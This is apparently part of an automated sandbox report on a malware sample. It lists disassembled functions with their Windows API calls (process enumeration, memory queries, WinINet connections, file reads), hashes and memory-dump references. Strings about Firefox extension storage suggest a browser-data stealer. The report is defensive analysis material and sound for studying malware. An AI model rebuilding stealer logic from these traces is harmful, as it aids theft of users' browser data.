                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1962333139.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_pjthjsdjgjrtavv.jbxd
                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: lstrcat$CurrentProfilelstrcpymallocmemsetstrncpy
                                                                                                                                                                                                                                                                                • String ID: Unknown
                                                                                                                                                                                                                                                                                • API String ID: 277847849-1654365787
                                                                                                                                                                                                                                                                                • Opcode ID: d785fc04096e95acf34b7e6468c066d787f928fe986cc39c3c6a36b777bc4be0
                                                                                                                                                                                                                                                                                • Instruction ID: 9523786d007b465f85d219b7e39a8a5dfbdd483b20afe91046872d233f87955e
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d785fc04096e95acf34b7e6468c066d787f928fe986cc39c3c6a36b777bc4be0
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9201A5313003187BD620B6629C56FEF775E9FC5758F04082EB9455B282DEBCA8C587AA
                                                                                                                                                                                                                                                                                Function 00410CB0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41memoryCOMMON
                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(?,Windows: ,?,?,00421508,?,?,Work Dir: In memory,?,?,00421509,?,?,?,?,00000000), ref: 00410CC1
                                                                                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,?,?,?,?,00417920,?,?), ref: 00410CCF
                                                                                                                                                                                                                                                                                  • Part of subcall function 00411270: memset.MSVCRT ref: 00411281
                                                                                                                                                                                                                                                                                • GlobalMemoryStatusEx.KERNEL32(?,?,00000000,00000040,?,?,?,?,?,?,?,?,?,?,00417920,?), ref: 00410CE7
                                                                                                                                                                                                                                                                                • wsprintfA.USER32 ref: 00410D0F
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961195294.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961240240.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961273700.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1962333139.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_pjthjsdjgjrtavv.jbxd
                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: Heap$AllocGlobalMemoryProcessStatusmemsetwsprintf
                                                                                                                                                                                                                                                                                • String ID: %d MB
                                                                                                                                                                                                                                                                                • API String ID: 1522292957-2651807785
                                                                                                                                                                                                                                                                                • Opcode ID: 4d81009c1fb0d01048417fa34eff7a46ff86d7423faa8b714d64e7233f6e460f
                                                                                                                                                                                                                                                                                • Instruction ID: 3e3ed3bcd73a1407d336ad636cad1e72ca107bb31f9cc5cd81d28413454cfe9f
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4d81009c1fb0d01048417fa34eff7a46ff86d7423faa8b714d64e7233f6e460f
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BEF02B71700200B7D7106715DC46F6F7BAADBC17B1F040119F656A32D0CA746C11C7DA
                                                                                                                                                                                                                                                                                Function 00402790 Relevance: 7.6, APIs: 5, Instructions: 104stringnetworkCOMMON
                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                • ??_U@YAPAXI@Z.MSVCRT(00000400,?,?,?,?,004042B3,00416A04,?,?,00416A04), ref: 004028AB
                                                                                                                                                                                                                                                                                • ??_U@YAPAXI@Z.MSVCRT(00000400,00416A04,?,?,00416A04), ref: 004028BB
                                                                                                                                                                                                                                                                                • ??_U@YAPAXI@Z.MSVCRT(00000400,?,00416A04,?,?,00416A04), ref: 004028CB
                                                                                                                                                                                                                                                                                • lstrlenA.KERNEL32(00000000,?,?,00416A04,?,?,00416A04), ref: 004028EA
                                                                                                                                                                                                                                                                                • InternetCrackUrlA.WININET(00000000,00000000,00000000,?), ref: 004028FA
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961195294.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961240240.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961273700.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1962333139.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_pjthjsdjgjrtavv.jbxd
                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: CrackInternetlstrlen
                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                • API String ID: 1274457161-0
                                                                                                                                                                                                                                                                                • Opcode ID: 338301ac71ae11cf9b1fde0c63b9cae2eea139686097d1af895d36c4ff47176c
                                                                                                                                                                                                                                                                                • Instruction ID: 62d16cf430872f387fa1639693609a914c0cef2d6ed42a20a6b15e59f3bc2f55
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 338301ac71ae11cf9b1fde0c63b9cae2eea139686097d1af895d36c4ff47176c
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C9516AA01083C089EB46DF29D4E97477E955B26318F1982D9DC880F2CBC3BAC558C7FA
                                                                                                                                                                                                                                                                                Function 00410FE0 Relevance: 7.6, APIs: 5, Instructions: 62processCOMMON
                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                  • Part of subcall function 004101C0: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,00417292,0042150A,?,?,?,?,00418606), ref: 004101E4
                                                                                                                                                                                                                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00411009
                                                                                                                                                                                                                                                                                • Process32First.KERNEL32(00000000,00000128), ref: 00411017
                                                                                                                                                                                                                                                                                • Process32Next.KERNEL32(00000000,00000128), ref: 00411027
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410340: lstrlenA.KERNEL32(?,?,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410359
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410340: lstrcpyA.KERNEL32(00000000,00000000,00000001,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410382
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410340: lstrcatA.KERNEL32(00000000,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 0041038A
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410290: lstrcpyA.KERNEL32(00000000,?,?,?,?,004172C1,?,?,00000000,?,00420AD0,0042150A), ref: 004102C8
                                                                                                                                                                                                                                                                                • Process32Next.KERNEL32(00000000,00000128), ref: 0041107A
                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00411085
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961195294.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961240240.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961273700.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1962333139.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_pjthjsdjgjrtavv.jbxd
                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: Process32lstrcpy$Next$CloseCreateFirstHandleSnapshotToolhelp32lstrcatlstrlen
                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                • API String ID: 562399079-0
                                                                                                                                                                                                                                                                                • Opcode ID: 58348e437a27bc0644566453b947fbefec51a5999494bbe316478c62b720522d
                                                                                                                                                                                                                                                                                • Instruction ID: ad10719cd445ab04cf283b63720ee16ebf2a6e79acd2848d50ffecdf406f3b24
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 58348e437a27bc0644566453b947fbefec51a5999494bbe316478c62b720522d
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 571182743002146FD7106B62AC89FFFBB9DEFC9754F04542EB50A86291DE7C9884C6A6
                                                                                                                                                                                                                                                                                Function 0040C530 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 184stringCOMMON
                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410200: lstrcpyA.KERNEL32(00000000,?,?,?,?,004175C6,?), ref: 00410223
                                                                                                                                                                                                                                                                                  • Part of subcall function 004076B0: CreateFileA.KERNEL32 ref: 004076EE
                                                                                                                                                                                                                                                                                  • Part of subcall function 004076B0: GetFileSizeEx.KERNEL32(00000000,?), ref: 00407700
                                                                                                                                                                                                                                                                                  • Part of subcall function 004076B0: LocalAlloc.KERNEL32(00000040,003694E8), ref: 00407723
                                                                                                                                                                                                                                                                                  • Part of subcall function 004076B0: ReadFile.KERNEL32(00000000,A075FFA4,003694E8,?,00000000), ref: 00407744
                                                                                                                                                                                                                                                                                  • Part of subcall function 004076B0: LocalFree.KERNEL32(A075FFA4), ref: 00407763
                                                                                                                                                                                                                                                                                  • Part of subcall function 004076B0: CloseHandle.KERNEL32(00000000), ref: 0040776C
                                                                                                                                                                                                                                                                                  • Part of subcall function 004115B0: LocalAlloc.KERNEL32(00000040,?,?,00000000,?,?,00416A58,00000000,00000000), ref: 004115D4
                                                                                                                                                                                                                                                                                  • Part of subcall function 004101C0: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,00417292,0042150A,?,?,?,?,00418606), ref: 004101E4
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410340: lstrlenA.KERNEL32(?,?,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410359
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410340: lstrcpyA.KERNEL32(00000000,00000000,00000001,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410382
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410340: lstrcatA.KERNEL32(00000000,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 0041038A
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410290: lstrcpyA.KERNEL32(00000000,?,?,?,?,004172C1,?,?,00000000,?,00420AD0,0042150A), ref: 004102C8
                                                                                                                                                                                                                                                                                  • Part of subcall function 004102E0: lstrcpyA.KERNEL32(00000000,00000000,?,?,?,?,?,00417585,?,?,?,C:\ProgramData\,0042150A,?,?,0000000C), ref: 00410320
                                                                                                                                                                                                                                                                                  • Part of subcall function 004102E0: lstrcatA.KERNEL32(00000000,?,?,00417585,?,?,?,C:\ProgramData\,0042150A,?,?,0000000C), ref: 0041032A
                                                                                                                                                                                                                                                                                • StrStrA.SHLWAPI(?,00000000,?,?,?,?,?,00421363,0042150A,?,?,?,?,?,?,?), ref: 0040C5DA
                                                                                                                                                                                                                                                                                • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000010,00000000,?,0040CC78,00000000,?,?), ref: 0040C5F8
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961195294.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961240240.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961273700.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1962333139.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_pjthjsdjgjrtavv.jbxd
                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                                                                                                                                                                                                                                                                                • String ID: ^userContextId=4294967295$moz-extension+++
                                                                                                                                                                                                                                                                                • API String ID: 998311485-3310892237
                                                                                                                                                                                                                                                                                • Opcode ID: adf5d0fcb4b42b563d8d2014ece056c47c6b9cd30f37acf02c607b39c5062cd4
                                                                                                                                                                                                                                                                                • Instruction ID: e851882c1721239b6607cf2b57b0a0084f57c32a141c23d73fe3fe214d6676a2
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: adf5d0fcb4b42b563d8d2014ece056c47c6b9cd30f37acf02c607b39c5062cd4
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 14616131A107199BCB14FBB1C9D69EE7368AF08308F40455EB91657142EF7CAEC8CBA5
                                                                                                                                                                                                                                                                                Function 00416EA0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 92stringCOMMON
                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                • lstrlenA.KERNEL32(00000000), ref: 00416EC0
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410200: lstrcpyA.KERNEL32(00000000,?,?,?,?,004175C6,?), ref: 00410223
                                                                                                                                                                                                                                                                                  • Part of subcall function 00403090: lstrlenA.KERNEL32(00000000,00000000,00000000,?,?,?), ref: 00403114
                                                                                                                                                                                                                                                                                  • Part of subcall function 00403090: StrCmpCA.SHLWAPI(?,https,0042150A,0042150A,0042150A,0042150A,00000000,00000000,00000000,00000000), ref: 0040316F
                                                                                                                                                                                                                                                                                  • Part of subcall function 00403090: InternetOpenA.WININET ref: 0040319E
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410290: lstrcpyA.KERNEL32(00000000,?,?,?,?,004172C1,?,?,00000000,?,00420AD0,0042150A), ref: 004102C8
                                                                                                                                                                                                                                                                                • StrCmpCA.SHLWAPI(00000000,ERROR,?,?,?,?,?), ref: 00416F77
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961195294.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961240240.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961273700.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1962333139.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_pjthjsdjgjrtavv.jbxd
                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: lstrcpylstrlen$InternetOpen
                                                                                                                                                                                                                                                                                • String ID: ERROR
                                                                                                                                                                                                                                                                                • API String ID: 3860179324-2861137601
                                                                                                                                                                                                                                                                                • Opcode ID: a41e2adf9883fe8727359321e92805b2a13fc33e9da6a27b96af3066c66adf7c
                                                                                                                                                                                                                                                                                • Instruction ID: 43c13bd387ffc7ea7dd124343602ed7a74854246be98469252eee39eb9cb9d78
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a41e2adf9883fe8727359321e92805b2a13fc33e9da6a27b96af3066c66adf7c
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5E3159719003099FCF00EFA5C9819EEBBB5BF48314F40445EF916A7251DB38A985CFA8
                                                                                                                                                                                                                                                                                Function 00413E50 Relevance: 4.6, APIs: 3, Instructions: 112sleepsynchronizationthreadCOMMON
                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410290: lstrcpyA.KERNEL32(00000000,?,?,?,?,004172C1,?,?,00000000,?,00420AD0,0042150A), ref: 004102C8
                                                                                                                                                                                                                                                                                • Sleep.KERNEL32(000003E8,?,?,?), ref: 00413F0F
                                                                                                                                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,00416EA0,?,00000000,00000000), ref: 00413F6C
                                                                                                                                                                                                                                                                                • WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00413F78
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961195294.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
